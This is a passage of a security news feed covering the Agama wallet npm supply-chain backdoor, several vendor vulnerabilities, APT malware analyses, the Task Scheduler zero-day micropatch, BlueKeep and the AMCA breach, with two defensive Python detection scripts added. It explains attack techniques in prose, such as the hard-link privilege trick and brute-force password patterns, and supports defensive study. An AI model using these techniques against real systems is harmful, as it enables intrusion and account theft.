The experts at the company moved around 8 million KMD and 96 BTC from the flawed Agama wallets to safe wallets under their control: RSgD2cmm3niFRu2kwwtrEHoHMywJdkbkeF (KMD) and 1GsdquSqABxP2i7ghUjAXdtdujHjVYLgqk (BTC).

The owners of those wallets that have not been swept, or that have other assets than KMD and BTC, have to move all their funds from Agama to a new address as soon as possible. Komodo provided a list of safe wallets and other information on its support page.

Experts pointed out that the Verus version of Agama wallet is not affected by this vulnerability, its latest version supports Komodo in both lite mode and native mode.

The backdoor in the Agama wallet app was discovered by the security team of the npm JavaScript package repository.

“The attack was carried out by using a pattern that is becoming more and more popular; publishing a “useful” package (electron-native-notify) to npm, waiting until it was in use by the target, and then updating it to include a malicious payload.” reads the post published by the npm, Inc. security team.

The npm security team spotted a supply chain attack: the attackers pushed a malicious update (version 1.1.6) of the electron-native-notify JavaScript library that included code designed to steal cryptocurrency wallet seeds and other login passphrases.

“The GitHub user sawlysawly published this commit on Mar 8th which added electron-native-notify^1.1.5 as a dependency to the EasyDEX-GUI application (which is used as part of the Agama wallet).” continues the security team at npm.

The experts discovered that the attackers targeted the Agama cryptocurrency wallet which was using the EasyDEX-GUI application that was loading the now-malicious electron-native-notify library.

The backdoor was added to the electron-native-notify library on March 8, and it was included in the main Agama wallet on April 13, when Komodo released Agama version 0.3.5.

This means that users that logged in to any version of Agama wallet after 13 April likely had their wallet credentials compromised.
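As an added illustration of the pattern npm describes above (not code from Komodo, npm or the Agama project), the following Python script diffs an audited package-lock.json against the current one and reports dependencies that moved without any edit to package.json. The package.json and lockfile contents are constructed, the project name and the extra dependency are placeholders, and the integrity hashes are placeholders too; only the electron-native-notify range and versions come from the article.

```python
"""Flag npm dependencies that silently changed between two lockfile snapshots.

Constructed example. The Agama incident pattern: package.json keeps a
caret range (^1.1.5), the attacker publishes 1.1.6 which satisfies it,
and the next install pulls the new version with no change to the declared
dependency. Diffing the audited lockfile against the current one surfaces
exactly that drift, plus any dependency that appeared from nowhere.
"""
import json
import re

# Constructed package.json fragment; the electron-native-notify range is the
# one the npm write-up names, the rest is placeholder.
PACKAGE_JSON = json.dumps({
    "name": "example-wallet-gui",
    "dependencies": {"electron-native-notify": "^1.1.5", "left-pad": "1.3.0"},
})

# Constructed lockfileVersion 1 snapshots; integrity values are placeholders,
# not real registry hashes.
LOCK_AUDITED = json.dumps({
    "lockfileVersion": 1,
    "dependencies": {
        "electron-native-notify": {"version": "1.1.5",
                                   "integrity": "sha512-PLACEHOLDER-A"},
        "left-pad": {"version": "1.3.0", "integrity": "sha512-PLACEHOLDER-B"},
    },
})
LOCK_CURRENT = json.dumps({
    "lockfileVersion": 1,
    "dependencies": {
        "electron-native-notify": {"version": "1.1.6",
                                   "integrity": "sha512-PLACEHOLDER-C"},
        "left-pad": {"version": "1.3.0", "integrity": "sha512-PLACEHOLDER-B"},
        "constructed-new-dep": {"version": "0.1.0",
                                "integrity": "sha512-PLACEHOLDER-D"},
    },
})


def is_floating_range(spec):
    """True when a semver spec lets npm resolve a newer publish than audited.

    Only an exact 'x.y.z' pins; caret, tilde, comparators and wildcards float.
    """
    return re.fullmatch(r"\d+\.\d+\.\d+", spec.strip()) is None


def lockfile_drift(package_json, audited_lock, current_lock):
    """Compare resolved version and integrity between two package-lock texts.

    Returns one finding per dependency that is new, or whose resolved version
    or integrity changed, noting whether the declared range allowed the move
    without anyone touching package.json.
    """
    declared = json.loads(package_json).get("dependencies", {})
    before = json.loads(audited_lock)["dependencies"]
    after = json.loads(current_lock)["dependencies"]
    findings = []
    for name, entry in after.items():
        old = before.get(name)
        spec = declared.get(name)  # None: transitive, never declared directly
        if old is None:
            kind = "new"
        elif (old["version"], old["integrity"]) != (entry["version"],
                                                     entry["integrity"]):
            kind = "changed"
        else:
            continue
        findings.append({
            "package": name,
            "kind": kind,
            "from": old["version"] if old else None,
            "to": entry["version"],
            "declared": spec,
            # Floating range or transitive dep: the upgrade arrived through the
            # registry alone, which is the Agama scenario.
            "silent": spec is None or is_floating_range(spec),
        })
    return findings


if __name__ == "__main__":
    for finding in lockfile_drift(PACKAGE_JSON, LOCK_AUDITED, LOCK_CURRENT):
        print(finding)
```

Run against the constructed snapshots it reports electron-native-notify moving from 1.1.5 to 1.1.6 under an unchanged caret range, and the new transitive dependency; left-pad, pinned and unchanged, is not reported.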

The npm experts also published a video that shows how the vulnerable version of the Agama wallet sends the private seed associated with a wallet to a remote server in the background.

Komodo experts used the same technique to transfer the funds of the company’s clients to a safe wallet before hackers could steal them.

Pierluigi Paganini

(SecurityAffairs – Komodo, hacking)


Tor Project released Tor Browser 8.5.1 for Windows, Mac, Linux, and Android

A new version of the popular Tor Browser was released by the Tor Project, it is Tor Browser 8.5.1 for Windows, Mac, Linux, and Android.

The Tor Project has released Tor Browser 8.5.1 for Windows, Mac, Linux, and Android, the new version of the popular anonymizing browser.

This release includes a temporary fix for a known WebGL fingerprinting technique. Tor Browser 8.5.1 can be downloaded for free from the Tor Browser download page and from the distribution directory.


The development team disabled the WebGL readPixel() function, which could be abused to fingerprint a Tor Browser user.

“Tor Browser 8.5.1 is the first bugfix release in the 8.5 series and aims at mostly fixing regressions and providing small improvements related to our 8.5 release.” reads the announcement from the Tor Project. “Additionally, we disable the WebGL readPixel() fingerprinting vector, realizing, though, that we need a more holistic approach when trying to deal with the fingerprinting potential WebGL comes with.”

The developers describe this fix as a temporary solution; a more holistic approach to WebGL fingerprinting is still needed.

Below is the full changelog since Tor Browser 8.5:

  • All platforms
    • Update Torbutton to 2.1.10
      • Bug 30565: Sync nocertdb with privatebrowsing.autostart at startup
      • Bug 30464: Add WebGL to safer descriptions
      • Translations update
    • Update NoScript to 10.6.2
      • Bug 29969: Remove workaround for Mozilla’s bug 1532530
    • Update HTTPS Everywhere to 2019.5.13
    • Bug 30541: Disable WebGL readPixel() for web content
  • Windows + OS X + Linux
    • Bug 30560: Better match actual toolbar in onboarding toolbar graphic
    • Bug 30571: Correct more information URL for security settings
  • Android
    • Bug 30635: Sync mobile default bridges list with desktop one
  • Build System
    • All platforms
      • Bug 30480: Check that signed tag contains expected tag name

Pierluigi Paganini

(SecurityAffairs – Tor Browser 8.5.1, Tor Project)


VMware addressed flaws in its Workstation and Tools

VMware has informed its users that it has patched two high-severity vulnerabilities that affect its Tools and Workstation software.

VMware has patched two high-severity flaws that affect its Tools and Workstation software.

The first security flaw, tracked as CVE-2019-5522, affects VMware Tools 10.x on Windows. The vulnerability is an out-of-bounds read issue in the vm3dmp driver in Windows guest machines; it was reported by researchers ChenNan and RanchoIce of Tencent ZhanluLab.

“VMware Tools update addresses an out of bounds read vulnerability in vm3dmp driver which is installed with vmtools in Windows guest machines.  VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.1.” reads the advisory published by VMware.

“A local attacker with non-administrative access to a Windows guest with VMware Tools installed may be able to leak kernel information or create a denial of service attack on the same Windows guest machine.”

The company addressed the vulnerability with the release of version 10.3.10; unfortunately, no workarounds are available.

The second issue, tracked as CVE-2019-5525, is a use-after-free bug affecting the Advanced Linux Sound Architecture (ALSA) backend in Workstation 15.x. The vulnerability could be exploited by an attacker with normal user privileges on the guest machine, chained with another vulnerability, to execute arbitrary code on the underlying Linux host.

“VMware Workstation contains a use-after-free vulnerability in the Advanced Linux Sound Architecture (ALSA) backend. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.5.” states the advisory.

“A malicious user with normal user privileges on the guest machine may exploit this issue in conjunction with other issues to execute code on the Linux host where Workstation is installed.”

The company addressed this vulnerability with the release of the Workstation 15.1.0 for Linux. The vulnerability, rated as “high severity,” was reported by Brice L’helgouarc’h from Amossys.

Pierluigi Paganini

(SecurityAffairs – hacking)


Remote code execution flaw in Ministra IPTV Platform exposes user data and more

Researchers at security firm CheckPoint have discovered multiple critical vulnerabilities in a popular IPTV middleware platform.

Security experts at CheckPoint have discovered multiple critical flaws in a popular IPTV middleware platform that is used by more than a thousand online media streaming services to manage their millions of subscribers.

Ministra TV platform is a PHP-based middleware platform for media streaming services, it manages Internet Protocol television (IPTV), video-on-demand (VOD) and over-the-top (OTT) content, licenses and their subscribers.

In order to receive the television broadcast, the set-top boxes (STB) connect to Ministra, and service providers use the platform to manage their customers.

The vulnerabilities affect the administrative panel of the Ministra TV platform (formerly Stalker Portal) and could be exploited by an attacker to bypass authentication and access information associated with subscribers.

Another worrying aspect of the discovery is that an attacker could exploit the flaws to broadcast and stream their own content to the devices of the affected networks.

The platform is developed by the Ukrainian company Infomir; most of the providers that use it are located in the United States (199), followed by the Netherlands (137), Russia (120), France (117) and Canada (105).

(Image: distribution of providers running the flawed Ministra IPTV platform)

“About a year ago Check Point Research discovered critical vulnerabilities in a Ukrainian TV streaming platform that, if exploited, could leave service providers exposed to a serious breach.” states a blog post published by Check Point. “The risks would be their entire customer database of personal info and financial details as well as allowing an attacker to potentially stream any content they choose on to the screens of their customer network.”

CheckPoint researchers discovered a logical vulnerability in an authentication process implemented by the Ministra platform. A function used to authenticate users fails to validate the request, allowing a remote attacker to bypass authentication and perform SQL injection by exploiting a separate vulnerability.

“[Ministra] It is PHP based, and like most web-based platforms, it has an admin interface that requires authentication.” continues the experts. “However, we were able to bypass the authentication mechanism and utilize some of the admin AJAX API functions. This led to SQL Injection chained to PHP Object Injection vulnerabilities, effectively allowing us to remotely execute code on the server.”

The experts also demonstrated in a video PoC that it is possible to chain the flaws with a PHP Object Injection issue to remotely execute arbitrary code on the targeted server.

“In this particular case, we used the authentication bypass to perform an SQL Injection on the server,” continues the post. “With that knowledge, we escalated this issue to an Object Injection vulnerability, which in turn allowed us to execute arbitrary code on the server, potentially impacting not only the provider but also the provider’s clients.”

The security experts reported the flaws to the company, that addressed them with the release of Ministra version 5.4.1.

Pierluigi Paganini

(SecurityAffairs – Ministra, hacking)


Cisco disclosed several flaws in Cisco Industrial Network Director

Cisco disclosed several flaws in its CISCO Industrial Network Director product, including a high severity code execution vulnerability.

Cisco employees discovered several vulnerabilities in CISCO Industrial Network Director product, including a high severity code execution flaw.

The Cisco Industrial Network Director is used to manage industrial networks; it helps operations teams gain full visibility into the automation network for improved system availability and increased overall equipment effectiveness.

Three flaws were discovered during internal security testing; the most serious one, tracked as CVE-2019-1861, is a remote code execution vulnerability that received a CVSS score of 7.2.


“A vulnerability in the software update feature of Cisco Industrial Network Director could allow an authenticated, remote attacker to execute arbitrary code.” reads the security advisory published by Cisco.

“The vulnerability is due to improper validation of files uploaded to the affected application. An attacker could exploit this vulnerability by authenticating to the affected system using administrator privileges and uploading an arbitrary file. A successful exploit could allow the attacker to execute arbitrary code with elevated privileges.”

The flaw could be exploited by an attacker who authenticates to the target system with admin privileges and uploads a malicious file, then executes arbitrary code with elevated privileges.

The security hole has been patched with the release of version 1.6.0. Prior versions are impacted.

Another flaw discovered in the Industrial Network Director is a stored cross-site scripting (XSS) issue tracked as CVE-2019-1882. The flaw, rated as medium severity, can be exploited remotely by an authenticated attacker to carry out XSS attacks.

“A vulnerability in Cisco Industrial Network Director could allow an authenticated, remote attacker to conduct stored cross-site scripting (XSS) attacks.” reads the Cisco Advisory.

“The vulnerability is due to improper validation of content submitted to the affected application. An attacker could exploit this vulnerability by sending requests containing malicious values to the affected system. A successful exploit could allow the attacker to conduct XSS attacks.”

The third flaw is a cross-site request forgery (CSRF) flaw that could be exploited by an unauthenticated attacker to perform arbitrary actions on the targeted device.

The flaw tracked as CVE-2019-1881 has been rated as medium severity.

“A vulnerability in the web-based management interface of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.” reads the advisory.

“The vulnerability is due to insufficient CSRF protections for the web-based management interface of the affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to use a web browser and the privileges of the user to perform arbitrary actions on an affected device.”

Pierluigi Paganini

(SecurityAffairs – CISCO, hacking)


Platinum APT leverages steganography to hide C2 communications

The Platinum cyber espionage group uses a steganographic technique to hide communications with its Command and Control servers (C&C).

Experts from Kaspersky have linked the Platinum APT group with cyber attacks involving an elaborate, and new steganographic technique used to hide communications with C2 servers.

The APT group was discovered by Microsoft in 2016; it targeted organizations in South and Southeast Asia. According to Microsoft, Platinum has been active since at least 2009 and was responsible for spear phishing attacks on ISPs, government organizations, intelligence agencies, and defense institutes.

The hackers don’t appear to be financially motivated, judging by the nature of the targeted entities and the group’s TTPs.

In June 2018, experts at Kaspersky were investigating attacks against government and military entities in South and Southeast Asian countries.

The experts tracked the campaign as EasternRoppels, they speculate it may have started as far back as 2012.

“In June 2018, we came across an unusual set of samples spreading throughout South and Southeast Asian countries targeting diplomatic, government and military entities. The campaign, which may have started as far back as 2012, featured a multi-stage approach and was dubbed EasternRoppels.” reads the analysis published by the expert. “The actor behind this campaign, believed to be related to the notorious PLATINUM APT group, used an elaborate, previously unseen steganographic technique to conceal communication.”

The attack chain starts with WMI subscriptions to run an initial PowerShell downloader and fetch another small PowerShell backdoor for system fingerprinting and downloading additional code. 

The initial WMI PowerShell scripts observed in different attacks were using different hardcoded command and control (C&C) IP addresses, different encryption keys, salt for encryption and different active hours.

The threat actor hosted the C&C addresses on free hosting services and used a large number of Dropbox accounts for storing the malicious code and the exfiltrated data.

Kaspersky spotted a backdoor while investigating another threat, further analysis allowed its experts to discover that it was a second stage malware used in one of the Platinum campaigns.

“We were able to find a backdoor that was implemented as a DLL and worked as a WinSock NSP (Nameservice Provider) to survive a reboot. The backdoor shares several features with the PowerShell backdoor described above: it has hardcoded active hours, it uses free domains as C&C addresses, etc.” continues Kaspersky.

The researchers discovered that the same domain was used to store exfiltrated data in the two attacks. The analysis of the encrypted files used in the second stage revealed a previously undiscovered backdoor associated with the Platinum group.

Hackers used a dropper to install the steganography backdoor, the malicious code creates directories for the backdoor and saves backdoor-related files in these folders. Then the dropper runs the backdoor, implements a persistence mechanism, and then removes itself. 

Once the backdoor is installed on a target machine, it connects to the C&C server and downloads an HTML page that contains embedded commands, encrypted with a key that is also embedded in the page.

“The page contains embedded commands that are encrypted with an encryption key, also embedded into the page. The embedded data is encoded with two steganography techniques and placed inside the <–1234567890> tag (see below). ” continues the analysis.


One of the steganography techniques used by the threat actors relies on the principle that HTML is indifferent to the order of tag attributes. The malicious code decodes the page line by line and collects the encryption key for the encoded data, which is embedded in the page right after the HTML tags; that data is encoded with a second steganography technique.

The backdoor supports several commands, it could upload, download and execute files, handle requests for lists of processes and directories, upgrade and uninstall itself, and change the configuration file. 

The analysis also revealed another tool used as a configuration manager that allows creating configuration and command files for the backdoors. The utility is able to configure more than 150 options.

Experts also discovered a P2P backdoor that has many similarities with the previous one, it uses the same command names and the same names of options in the configuration files. 

“However, there are significant differences, too. The new backdoor actively uses many more of the options from the config, supports more commands, is capable of interacting with other infected victims and connecting them into a network (see the “Commands” section for details), and works with the C&C server in a different way. In addition, this backdoor actively uses logging: we found a log file dating back to 2012 on one victim PC.” continues the analysis.

The backdoor is able to sniff network traffic without keeping any socket in listening mode, it creates a listening socket every time someone attempts to connect.

According to the experts, the backdoor might have been active since at least 2012. 

“We have discovered a new attack by this group and noted that the actors are still working on improving their malicious utility and using new techniques for making the APT stealthier.” concludes Kaspersky. “Finally, based on the custom cryptor used by the actors, we have been able to attribute this attack to the notorious PLATINUM group, which means this group is still active.”

Pierluigi Paganini

(SecurityAffairs – PLATINUM APT, hacking)


Analyzing the APT34’s Jason project

Security expert Marco Ramilli has analyzed the recently leaked APT34 hacking tool tracked as Jason – Exchange Mail BF.

Today I want to share a quick analysis of a newly leaked APT34 tool in order to track similarities between the publicly available APT34 toolsets. This time it is the APT34 Jason – Exchange Mail BF project, leaked by Lab Dookhtegan on June 3, 2019.

Original Leak

Context

According to FireEye, APT34 has been active since 2014. APT 34, also referred to as “OilRig” or Helix Kitten, has been known to target regional corporations and industries. Although there was information about APT34 prior to 2019, a series of leaks on the website Telegram by an individual named “Lab Dookhtegan”, including Jason project, exposed many names and activities of the organization.

“APT34 conducts cyber espionage on behalf of Iran. Iran seeks to diminish the capabilities of other regional powers to create leverage and better establish itself. This strategy is especially important against nations it sees as a threat to its regional power such as Saudi Arabia and the United Arab Emirates.”

Michael Lortz

Analysis

Jason is a graphical tool implemented to perform Microsoft Exchange account brute-forcing in order to “harvest” as much email and account information as possible. Distributed in a ZIP container (a copy is available here), the interface is quite intuitive: the Microsoft Exchange address and its version must be provided (even if a DNS-domain discovery function is available in the code). Three brute-force methods can be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). A username and password list can be selected (included in the distributed ZIP file) and the number of threads should be provided in order to balance the attack load.

(Image: Jason project GUI)

Deflating the ZIP container, three artifacts come out. Jason.exe represents the graphical user interface and the main visible tool. Microsoft.Exchange.WebService.dll, a Microsoft-developed library, includes the real functionality used by Jason.exe. PassSample includes some pattern implementations of possible passwords (i.e. [User@first]@@[user@first]123), and a folder named PasswordPatters includes building blocks for password guessing. For example, it wraps up a file called Year.txt including numbers from 1900 to 2020, a file called numspecial.txt including special number patterns and special-char patterns, a file called num4.txt including numbers from 0 to 999 and from 0002 (why not 0001 or 0000?) to 9998 (why not 9999?) and finally a file called num4special.txt including special number patterns like 1234, 7890, 0707, and so on and so forth.

Leaked ZIP content

Digging into the two .NET artifacts (Jason.exe and Microsoft.Exchange.WebService.dll) shows that both were written against the .NET Framework. The DLL is the EWS Managed API, which provides a managed interface for developing .NET client applications that use EWS; through it a developer can access almost all the information stored in an Office 365, Exchange Online or Exchange Server mailbox. The author used an old version of Microsoft.Exchange.WebService.dll, assembly version 15.0.0.0, which according to Microsoft documentation dates back to 2012.

WebService.dll assembly version

The last available Microsoft.Exchange.WebService.dll dates back to 2015, as shown in the following image, which might suggest when Jason was written, even if it is not irrefutable evidence.

Last Microsoft Exchange WebServices dll version dates to 2015

Analyzing the reversed byte-code, a real eye-catcher (at least from my personal point of view) is the “exception safety” that has been built in. In other words, the developer added many checks, such as variable checks, null checks, object index and object key checks, in order to reduce the probability of unhandled exceptions. These “exception protections” are usually adopted in two main scenarios: (i) the end user is not a very technical person, so he might end up in unexpected conditions, or (ii) the author is a professional developer trained to write product-oriented code rather than merely working code (which is what attackers usually write). The following images show a couple of code snippets where the developer decided to protect the code from unexpected user behavior.

Basic exception prevention 1
Basic exception prevention 2

Comparing the code style with my previous analyses of APT34 (OilRig), which you can find here and here, we can observe similar code protection. Even though the language is different, the basic exception prevention in Jason is very close to that of, for example, the “ICAP.py script injection” function. Another weak similarity is the logging style: Jason and, for example, the Glimpse project have a similar file-logging function that builds strings by concatenation with special operators (no format-based casting or safe conversions such as “%s”) and writes one log line at each function's focal points.

I am aware that these are weak similarities and that there is no additional evidence tying Jason to previously leaked APT34 tooling beyond the trusted source (Lab Dookhtegan), so I am not giving any personal attribution: on what is known, it is very hard to attribute Jason directly to APT34.

On the other hand, the Jason project does not share its main source language with the previously analyzed APT34 tools, it includes no DNS tricks or evidence of DNS usage, it contains no distinguishing patterns or language mistakes, and it was recompiled in January 2019 using older technology. As already discussed, it shares just a few code-style similarities with Glimpse and WebMask.

Additional technical details, including Yara Rules and IoCs, are reported in the original analysis published by Marco Ramilli on his blog:

https://marcoramilli.com/2019/06/06/apt34-jason-project/

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (at the National Institute of Standards and Technology, Security Division), where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I do have experience in security testing, since I have been performing penetration testing on several US electronic voting systems. I have also been put in charge of testing the uVote voting system for the Italian Minister of homeland security. I met Palantir Technologies, where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experience by diving into SCADA security issues with some of the biggest industrial conglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I have ever experienced! Now I technically lead Yoroi, defending our customers and strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – Jason, APT34)



The post Analyzing the APT34’s Jason project appeared first on Security Affairs.

0patch experts released unofficial Patch Available for Recent Windows 10 Task Scheduler Zero-Day

Experts at 0patch released an unofficial patch to address a recently disclosed zero-day vulnerability in Windows 10 Task Scheduler. 

Security experts at 0patch released an unofficial patch to address a recently disclosed zero-day vulnerability in Windows 10 Task Scheduler. 

A couple of weeks ago, the researcher SandboxEscaper released a working exploit for the vulnerability. Like the Windows zero-day disclosed in August 2018, this new issue affects the Microsoft Windows Task Scheduler.

SandboxEscaper demonstrated that it is possible to trigger the zero-day by importing malformed legacy tasks (.JOB format) into the Task Scheduler utility; although the format is legacy, such tasks can still be added to newer versions of the operating system.

When a JOB file is imported, the Task Scheduler service rewrites the file's DACL (discretionary access control list) with SYSTEM privileges, and the importing user controls which file actually receives that write.

The experts pointed out that if the DACL is absent, the system grants any user full access to the file.

The researcher explained that in order to trigger the flaw it is necessary to import legacy task files into the Task Scheduler on Windows 10.

Will Dormann, vulnerability analyst at CERT/CC, confirmed that the Windows zero-day works on a fully patched (May 2019) Windows 10 x86 system.

“Microsoft Windows contains a privilege escalation vulnerability in the way that the Task Scheduler SetJobFileSecurityByName() function is used, which can allow an authenticated attacker to gain SYSTEM privileges on an affected system.” wrote Dormann.

Dormann was able to reproduce the issue by recompiling the exploit on 64-bit Windows 10 and on Windows Server 2016 and 2019; on Windows 8 and 7 he could not reproduce it with the public technique.

“We have confirmed that the public exploit code functions reliably on 32- and 64-bit Windows 10 platforms, as well as Windows Server 2016 and Windows Server 2019.” continues Dormann. “While Windows 8 still contains this vulnerability, exploitation using the publicly-described technique is limited to files where the current user has write access, in our testing,”

According to experts at 0patch, only the legacy schtasks.exe can be abused to escalate privileges. With the modern Task Scheduler, the user setting the task would need write permission on a file in order to modify it.

“After some head-scratching, we remembered that this attack only works with the legacy schtasks.exe, and not with the new one. Could it be that the old schtasks.exe was calling some other RPC function than _SchSetRpcSecurity, which then in turn called _SchSetRpcSecurity via RPC?” reads the analysis published by 0patch.


The researchers discovered that the process, which runs with attacker privileges, calls RPC endpoint taskcomp!SASetAccountInformation in Task Scheduler’s process svchost.exe (running as Local System), which in turn calls RPC endpoint schedsvc!_SchRpcSetSecurity in the same svchost.exe (still running as Local System). 

The experts found that taskcomp.dll, running as Local System, impersonates itself (Local System) in order to enable the SeRestorePrivilege privilege it needs to set the DACL and ownership on any file.

“We believe it was actually an error to impersonate self in taskcomp.dll instead of impersonating the client. The latter would in fact allow the security check in schedsvc!_SchRpcSetSecurity to perform correctly and work as intended on a regular file as well as on a hard-linked system file (correctly failing when invoked by a low-privileged user).” continues 0patch.

“We therefore decided to replace self-impersonation with client-impersonation, and to do that, we removed the call to ImpersonateSelfWithPrivilege and injected a call to RpcImpersonateClient in its place.”

Unfortunately, the exploit still worked, because taskcomp.dll makes a second RPC call to SchRpcSetSecurity when the first one fails. The experts at 0patch therefore removed the call to SetSecurity completely.

“After that, we got the desired behavior: The legacy schtasks.exe was behaving correctly when creating a new task from a job file, and […] the hard link trick no longer worked because the Task Scheduler process correctly identified the caller and determined that it doesn’t have sufficient permissions to change DACL or ownership on a system file,” continues 0patch. 

0patch released a micropatch that addresses the vulnerability on all Windows 10 systems running the 0patch Agent. The researchers explained that the micropatch does not modify schedsvc.dll, which means the non-legacy Task Scheduler code path is left untouched.
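Because the public technique depends on swapping a task's .job file for a hard link to a system file before the service rewrites its DACL, a hard-linked .job under the legacy job store is a useful thing to look for on hosts that have not received the micropatch. The script below is an added example written for this page, not 0patch's or SandboxEscaper's code; it assumes the legacy job store is %SystemRoot%\Tasks and relies on the link count that os.stat reports on Windows as well as on POSIX.

```python
"""Flag legacy Task Scheduler .job files that are hard links.

Added example; it is neither 0patch's nor SandboxEscaper's code. The public
technique replaces a task's .job file under %SystemRoot%\\Tasks with a hard
link to a system file, so that the DACL rewrite performed by the SYSTEM-level
Task Scheduler service lands on the link target. A .job entry whose on-disk
link count is above 1 is therefore worth a second look.
"""
import os
from pathlib import Path

# Assumption: the legacy job store lives in %SystemRoot%\Tasks.
DEFAULT_JOB_DIR = Path(os.environ.get("SystemRoot", r"C:\Windows")) / "Tasks"


def find_hardlinked_jobs(job_dir=DEFAULT_JOB_DIR):
    """Return [(path, link_count)] for *.job files with more than one hard link.

    os.stat().st_nlink is populated on Windows as well as on POSIX systems, so
    the check runs anywhere; a .job file freshly written by schtasks.exe has a
    link count of 1.
    """
    job_dir = Path(job_dir)
    findings = []
    if not job_dir.is_dir():
        return findings
    for entry in sorted(job_dir.iterdir()):
        # Symlinks and reparse points are a different finding; skip them here.
        if entry.suffix.lower() != ".job" or entry.is_symlink() or not entry.is_file():
            continue
        link_count = entry.stat().st_nlink
        if link_count > 1:
            findings.append((str(entry), link_count))
    return findings


if __name__ == "__main__":
    hits = find_hardlinked_jobs()
    if not hits:
        print(f"no hard-linked .job files under {DEFAULT_JOB_DIR}")
    for path, count in hits:
        print(f"REVIEW {path}: {count} hard links (fsutil hardlink list shows the targets)")
```

Run it as a scheduled check or from an EDR script; when it fires, `fsutil hardlink list <file>` shows which system file the link points at, and that file's DACL and owner should be compared against a known-good host.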

“As always, if you have 0patch Agent installed and registered, this micropatch is already on your computer – and applied to taskcomp.dll in your Task Scheduler service. If you don’t have the 0patch Agent yet, you can register a 0patch account and install it to get this micropatch applied.” concludes 0patch.

“Following our guidelines on which patches to provide for free, this micropatch affects many home and education users, and is therefore included in both FREE and PRO 0patch license until Microsoft provides an official fix. After that the micropatch will only be included in the PRO license.”

The micropatch released by 0patch works on fully updated:

  1. Windows 10 version 1809 32bit
  2. Windows 10 version 1809 64bit
  3. Windows Server 2019

Pierluigi Paganini

(SecurityAffairs – Task Scheduler, zero-day)

The post 0patch experts released unofficial Patch Available for Recent Windows 10 Task Scheduler Zero-Day appeared first on Security Affairs.

NSA urges Windows Users and admins to Patch BlueKeep flaw

The National Security Agency (NSA) is urging Windows users and administrators to install security updates to address BlueKeep flaw (aka CVE-2019-0708).

Last week Microsoft issued a second security advisory to warn users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

Now the National Security Agency (NSA) is also urging Windows users and administrators to install security updates to address BlueKeep flaw (aka CVE-2019-0708).

The vulnerability, tracked as CVE-2019-0708, affects Windows Remote Desktop Services (RDS) and was addressed by Microsoft with the May 2019 Patch Tuesday updates. BlueKeep is wormable: malware authors could use it to build malicious code with WannaCry-like self-propagation capabilities.

As explained by Microsoft, the flaw can be exploited without user interaction, which makes it possible for wormable malware to spread in an uncontrolled way across target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. On Windows 7 and Server 2008, enabling Network Level Authentication (NLA) prevents unauthenticated exploitation, and blocking TCP port 3389 at the perimeter also mitigates the threat.

Security experts believe it is only a matter of time before threat actors start exploiting it in the wild. A few hours ago, the security researcher Zǝɹosum0x0 announced that he had developed a module for the popular Metasploit penetration testing framework to exploit the critical BlueKeep flaw.

The Metasploit module could be used to trigger the BlueKeep flaw on vulnerable Windows XP, 7, and Server 2008, but the expert has not publicly disclosed it to avoid threat actors abusing it.

“The National Security Agency is urging Microsoft Windows administrators and users to ensure they are using a patched and updated system in the face of growing threats. Recent warnings by Microsoft stressed the importance of installing patches to address a protocol vulnerability in older versions of Windows.” reads the NSA’s advisory.

“This is the type of vulnerability that malicious cyber actors frequently exploit through the use of software code that specifically targets the vulnerability. For example, the vulnerability could be exploited to conduct denial of service attacks. It is likely only a matter of time before remote exploitation code is widely available for this vulnerability. NSA is concerned that malicious cyber actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.

NSA urges everyone to invest the time and resources to know your network and run supported operating systems with the latest patches.”


In addition to installing the patches from Microsoft, Windows users can mitigate attacks as follows:

  • Block TCP port 3389 at your firewalls, especially any perimeter firewall exposed to the internet. RDP listens on this port, so blocking it stops attempts to establish a connection from outside.
  • Enable Network Level Authentication. With NLA, an attacker needs valid credentials before reaching the code that exposes the remote code execution flaw; it does not protect against an attacker who already has an account on the system, so patching is still required.
  • Disable Remote Desktop Services if they are not required. Disabling unused and unneeded services reduces exposure to security vulnerabilities in general and is a best practice even without the BlueKeep threat.

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post NSA urges Windows Users and admins to Patch BlueKeep flaw appeared first on Security Affairs.

Tens of Million patients impacted by the AMCA data breach

Outsourced silos of personal info raided, at least 200,000 payment details swiped

The medical debt collection agency American Medical Collection Agency (AMCA) suffered a data breach that could impact many of its customers.

American Medical Collection Agency (AMCA) suffered a data breach that could impact many of its customers, and the company still hasn’t disclosed details.

In a filing with the U.S. Securities and Exchange Commission (SEC), Quest Diagnostics revealed that the attackers had access to the web payment portal of the American Medical Collection Agency between August 1, 2018 and March 30, 2019.

AMCA provides services to numerous firms, including the revenue cycle management provider Optum360, medical testing firm Quest Diagnostics, and LabCorp.


The security breach has impacted roughly 12 million of Quest Diagnostics‘ patients and roughly 7.7 million of LabCorp's patients. After the disclosure of the incident, LabCorp announced it was terminating its business with AMCA, and Quest Diagnostics suspended sending collection requests to AMCA.

The hackers broke into company databases containing millions of medical test lab patients’ personal and payment information.

“LabCorp has referred approximately 7.7 million consumers to AMCA whose data was stored in the affected AMCA system. AMCA’s affected system included information provided by LabCorp.” reads the Form 8-K filing.

“That information could include first and last name, date of birth, address, phone, date of service, provider, and balance information. AMCA’s affected system also included credit card or bank account information that was provided by the consumer to AMCA (for those who sought to pay their balance). LabCorp provided no ordered test, laboratory results, or diagnostic information to AMCA.”

AMCA also told LabCorp that Social Security numbers and insurance identification information are not stored or maintained for LabCorp consumers.

